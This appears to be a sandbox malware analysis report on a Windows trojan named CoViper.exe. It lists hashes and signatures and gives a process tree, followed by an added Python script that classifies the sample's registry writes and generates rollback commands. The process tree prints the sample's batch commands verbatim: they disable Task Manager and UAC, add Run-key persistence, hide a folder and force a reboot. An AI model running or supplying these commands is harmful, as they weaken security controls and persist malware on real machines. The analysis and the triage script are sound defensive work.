Analysis

  • max time kernel
    12s
  • max time network
    64s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    09-05-2023 19:16

Errors

Reason
Machine shutdown: the sample's own shutdown -r -t 5 (PID 1392 in the process tree below) rebooted the guest and ended the run, so the report covers only the activity before that reboot.

General

  • Target

    trojan-leaks-main/CoViper.exe

  • Size

    286KB

  • MD5

    e20ee9bbbd1ebe131f973fe3706ca799

  • SHA1

    4e92e5cbe9092f94b4f4951893b5d9ca304d292c

  • SHA256

    f632b6e822d69fb54b41f83a357ff65d8bfc67bc3e304e88bf4d9f0c4aedc224

  • SHA512

    d50524992662aa84d5b4340525a25d915e91e464a725aa6851de206fd294aa7f4fcefe695ce463ce652b0a03874b75c0678b4c708d2b71f7c18804d1365d3458

  • SSDEEP

    6144:egtJZ0NSt7Jb/Is8vIfYg6KcZQV7GdRMrKUIvcgfoS3Qz89r:egWNStd7R8cYgsZK7qCrqfoS3Mcr

Malware Config

Signatures

  • UAC bypass (3 TTPs, 1 IoC)
  • Disables Task Manager via registry modification
  • UPX packed file (3 IoCs)

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application (2 TTPs, 6 IoCs)
  • Modifies registry key (1 TTP, 10 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (52 IoCs)
  • Views/modifies file attributes (1 TTP, 1 IoC)

Processes

  • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\CoViper.exe
    "C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\CoViper.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\C572.tmp\coronavirus.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Windows\SysWOW64\attrib.exe
        attrib +H C:\COVID-19
        3⤵
        • Views/modifies file attributes
        PID:820
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v disabletaskmgr /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:628
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • Modifies registry key
        PID:332
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v wallpaper /t REG_SZ /d C:\COVID-19\wallpaper.jpg /f
        3⤵
        • Modifies registry key
        PID:320
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:1872
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Control Panel\Cursors /v Arrow /t REG_SZ /d C:\COVID-19\cursor.cur /f
        3⤵
        • Modifies registry key
        PID:432
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Control Panel\Cursors /v AppStarting /t REG_SZ /d C:\COVID-19\cursor.cur /f
        3⤵
        • Modifies registry key
        PID:964
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\Control Panel\Cursors /v Hand /t REG_SZ /d C:\COVID-19\cursor.cur /f
        3⤵
        • Modifies registry key
        PID:1788
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v CheckForUpdates /t REG_SZ /d C:\COVID-19\Update.vbs /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:1696
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.exe /t REG_SZ /d C:\COVID-19\run.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:1940
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\software\Microsoft\Windows\CurrentVersion\Run /v GoodbyePC! /t REG_SZ /d C:\COVID-19\end.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:1644
      • C:\Windows\SysWOW64\shutdown.exe
        shutdown -r -t 5
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1392
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0
    1⤵
    PID:1664
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x1
    1⤵
    PID:1004
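
The ten reg.exe invocations in the tree above are the whole behavioural story of this run: a batch file hides C:\COVID-19, disables Task Manager and UAC, locks the wallpaper and cursors, registers three Run entries and reboots. What a responder wants from that is a triage step that turns such process-creation lines into classified IoCs and the matching rollback. The script below is an added example, not code from the report or from the sample: it parses the reg.exe ADD command lines copied from this page, tags each with the signature names the report uses, and emits a reg.exe command that reverts it. The classification rules, the rollback choices (delete the value, or restore EnableLUA to 1) and the assumption that the flags appear in the order /v /t /d /f are mine, not something the report states.

```python
"""Triage helper for the reg.exe activity in the process tree above.

Added example, not part of the sandbox report or of the sample: it parses the
`reg.exe ADD` command lines the report shows, tags each with the signature
names the report uses, and emits a reg.exe command that reverts it. The
classification rules and the rollback logic are assumptions of this example.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Command lines copied verbatim from the process tree in the report.
OBSERVED_COMMANDS = [
    r"reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v disabletaskmgr /t REG_DWORD /d 1 /f",
    r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f",
    r"reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v wallpaper /t REG_SZ /d C:\COVID-19\wallpaper.jpg /f",
    r"reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f",
    r"reg.exe ADD HKCU\Control Panel\Cursors /v Arrow /t REG_SZ /d C:\COVID-19\cursor.cur /f",
    r"reg.exe ADD HKCU\Control Panel\Cursors /v AppStarting /t REG_SZ /d C:\COVID-19\cursor.cur /f",
    r"reg.exe ADD HKCU\Control Panel\Cursors /v Hand /t REG_SZ /d C:\COVID-19\cursor.cur /f",
    r"reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v CheckForUpdates /t REG_SZ /d C:\COVID-19\Update.vbs /f",
    r"reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.exe /t REG_SZ /d C:\COVID-19\run.exe /f",
    r"reg.exe ADD HKLM\software\Microsoft\Windows\CurrentVersion\Run /v GoodbyePC! /t REG_SZ /d C:\COVID-19\end.exe /f",
]

# Matches the flag order the sample uses (/v /t /d [/f]). Key paths may contain
# spaces ("Control Panel"), so the key is matched lazily up to the first /v.
REG_ADD = re.compile(
    r"^reg(?:\.exe)?\s+ADD\s+(?P<key>.+?)\s+/v\s+(?P<value>\S+)"
    r"\s+/t\s+(?P<type>REG_\w+)\s+/d\s+(?P<data>.+?)(?:\s+/f)?\s*$",
    re.IGNORECASE,
)

@dataclass
class RegChange:
    key: str
    value: str
    type: str
    data: str
    signatures: List[str] = field(default_factory=list)

def parse_reg_add(cmdline: str) -> Optional[RegChange]:
    """Return the registry write a reg.exe ADD line performs, or None."""
    m = REG_ADD.match(cmdline.strip())
    if m is None:
        return None
    return RegChange(m["key"], m["value"], m["type"].upper(), m["data"])

def classify(change: RegChange) -> List[str]:
    """Tag a write with the report's signature names (rules are this example's)."""
    key, value = change.key.lower(), change.value.lower()
    sigs = ["Modifies registry key"]  # every reg.exe ADD counts here
    if key.endswith(r"\policies\system") and value == "disabletaskmgr" and change.data == "1":
        sigs.append("Disables Task Manager via registry modification")
    if (key.startswith(("hklm", "hkey_local_machine")) and key.endswith(r"\policies\system")
            and value == "enablelua" and change.data == "0"):
        # EnableLUA=0 switches UAC off machine-wide after the next reboot,
        # which the sample forces with shutdown -r; the report calls it "UAC bypass".
        sigs.append("UAC bypass")
    if key.endswith(r"\currentversion\run") or key.endswith(r"\currentversion\runonce"):
        sigs.append("Adds Run key to start application")
    return sigs

def rollback_command(change: RegChange) -> str:
    """reg.exe command that reverts the write.

    Assumes the value was absent on the clean host, the normal state for these
    policy, wallpaper, cursor and Run values; EnableLUA is set back to its
    default of 1 instead. HKLM writes need an elevated prompt, and the
    EnableLUA change only takes effect after a reboot.
    """
    if change.value.lower() == "enablelua":
        return f"reg.exe ADD {change.key} /v {change.value} /t REG_DWORD /d 1 /f"
    return f"reg.exe DELETE {change.key} /v {change.value} /f"

def triage(cmdlines: List[str]) -> List[RegChange]:
    """Parse and classify every reg.exe ADD line; other lines are skipped."""
    changes = []
    for line in cmdlines:
        change = parse_reg_add(line)
        if change is not None:
            change.signatures = classify(change)
            changes.append(change)
    return changes

def signature_counts(changes: List[RegChange]) -> dict:
    """Per-signature IoC counts, comparable to the report's Signatures list."""
    counts: dict = {}
    for change in changes:
        for sig in change.signatures:
            counts[sig] = counts.get(sig, 0) + 1
    return counts

if __name__ == "__main__":
    found = triage(OBSERVED_COMMANDS)
    for change in found:
        print(f"{change.key}\\{change.value} = {change.data}  [{', '.join(change.signatures)}]")
        print(f"    revert: {rollback_command(change)}")
    print(signature_counts(found))
```

Run against the report's ten lines it yields 10 "Modifies registry key", 3 "Adds Run key to start application", 1 "UAC bypass" and 1 "Disables Task Manager via registry modification", which is the breakdown the Signatures section shows. The rollback output is only a starting point: the HKLM entries point at C:\COVID-19\Update.vbs, run.exe and end.exe, so the hidden directory itself (attrib +H C:\COVID-19 in the tree) has to be removed as well, and the EnableLUA restore is not visible until the host reboots again.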

      Network

      MITRE ATT&CK Enterprise v6

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\C572.tmp\coronavirus.bat

        Filesize

        1KB

        MD5

        e9b2f5e9305dc2a39258d69264647c53

        SHA1

        87653e2ba1bf810feb472391cef4ffae82e38ea9

        SHA256

        4fd9b85eec0b49548c462acb9ec831a0728c0ef9e3de70e772755834e38aa3b3

        SHA512

        7b0ff3dde5ba6d098f970a8d09c690652607cb3f8806b942922f7b92df45b4cc788f13dd376b6d48404178a5462baddafbb61b893074b42dbf14836826af9881

      • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\Update.vbs

        Filesize

        156B

        MD5

        bfbafdf20dadf4e83476228f2f86e80c

        SHA1

        fcc31feb12f3ccd786b17d46c5f487c22ea74a38

        SHA256

        a1a8d79508173cf16353e31a236d4a211bdcedef53791acce3cfba600b51aaec

        SHA512

        157ba2aaa5bd715119381a593ec78ac83f2e2e35512764ec99878cd4019d87837bb96457cb2de5e64df1510cf2935aa91918c27e686a2451c095bbbaedc84321

      • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\cursor.cur

        Filesize

        13KB

        MD5

        21f48a9e113317b8e2b3ce5366621aa1

        SHA1

        674c0fc07675d3455780690c38f25f6fbd20b401

        SHA256

        13c4423ed872e71990e703a21174847ab58dec49501b186709b77b772ceeab52

        SHA512

        50b99a9e44b3fefce32ad729048d8491cfa403425efe84c48038ab97dbdb403fbe35dfd50a82018d180144e1c84243622f45a2b11a06e6f105f13636fff7d75b

      • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\end.exe

        Filesize

        47KB

        MD5

        7def1c942eea4c2024164cd5b7970ec8

        SHA1

        b2f4288577bf8f8f06a487b17163d74ebe46ab43

        SHA256

        c3f11936fe43d62982160a876cc000f906cb34bb589f4e76e54d0a5589b2fdb9

        SHA512

        87b023b8550fcb7b7948b33eb76dd8e22452669fba280b384bc2c2162d908eaa95cdac3f31136bc2aed07944cebdc22bce34f2a96ce4f40353645f5a2a94f5ce

      • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\mainWindow.exe

        Filesize

        148KB

        MD5

        e6ccc960ae38768664e8cf40c74a9902

        SHA1

        d29cbc92744db7dc5bb8b7a8de6e3fa2c75b9dcd

        SHA256

        b780e24e14885c6ab836aae84747aa0d975017f5fc5b7f031d51c7469793eabe

        SHA512

        a3a7fa630bafa9508b78af298893733b365e4a185a47b231fb0bfdffc4ed2adacbdbc65fd8261cdd8a589998590a82416cb21200e0eed1bcef67b7655c9b101d

      • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\run.exe

        Filesize

        21KB

        MD5

        b1349ca048b6b09f2b8224367fda4950

        SHA1

        44fac7dd4b9b1ccc61af4859c8104dd507e82e2d

        SHA256

        c46c3d2bea1e42b628d6988063d247918f3f8b69b5a1c376028a2a0cadd53986

        SHA512

        f1cc8116d6eb91e6ecb214ac647c7a9a4ca7d2733af3bbca68939722c11e61a33213aa8c1cc6024c0f186db9edca48006f8f13d3282c7be921b3246cba975810

      • C:\Users\Admin\AppData\Local\Temp\trojan-leaks-main\wallpaper.jpg

        Filesize

        1KB

        MD5

        087f4545e13bd7b8e1f36c941a62f8a4

        SHA1

        f43ac7023ca49efe5509993667f04c2fbf6ac722

        SHA256

        4a17f58a8bf2b26ece23b4d553d46b72e0cda5e8668458a80ce8fe4e6d90c42d

        SHA512

        8b309437fb43ce8667ead9709fd5700b719ee46bd294c4ee4b554cd064de63b3d5165bac83e349c54491a97c8f2241dc29f92f586c5ef50689b681386dc07c31

      • memory/1004-83-0x0000000002820000-0x0000000002821000-memory.dmp

        Filesize

        4KB

      • memory/1268-80-0x0000000000400000-0x0000000000473000-memory.dmp

        Filesize

        460KB

      • memory/1268-81-0x0000000000400000-0x0000000000473000-memory.dmp

        Filesize

        460KB

      • memory/1664-82-0x00000000027C0000-0x00000000027C1000-memory.dmp

        Filesize

        4KB